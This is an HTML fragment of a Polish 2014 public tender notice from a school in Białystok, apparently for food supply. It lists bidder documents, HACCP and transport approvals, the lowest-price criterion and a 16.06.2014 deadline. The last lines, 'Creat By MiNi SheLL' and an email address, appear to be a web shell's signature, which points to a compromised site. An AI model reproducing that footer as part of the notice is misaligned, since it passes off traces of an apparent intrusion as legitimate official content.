<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie o wprowadzonych procedurach HACCP;
2. Zaświadczenie z Sanepidu o dopuszczeniu środków transportu, które będą dostarczać żywność do zamawiającego oraz ich wykaz;
3. Przedstawienia aktualnej decyzji właściwej terytorialnie PPIS o zatwierdzeniu zakładu do prowadzenia działalności w zakresie obrotu żywnością i wpisie do rejestru zakładu podlegającego urzędowej kontroli - ustawy o bezpieczeństwie żywności i żywienia (Dz. U. z 2010r. Nr 21 poz. 105).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zsi1.internetdsl.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Integracyjnych im. Jana Pawła II w Białymstoku 
ul. Łagodna 10 
15-757 Białystok
Sekretariat Szkoły.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.06.2014 godzina 09:00, miejsce: Zespół Szkół Integracyjnych im. Jana Pawła II w Białymstoku 
ul. Łagodna 10 
15-757 Białystok
Sekretariat Szkoły.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com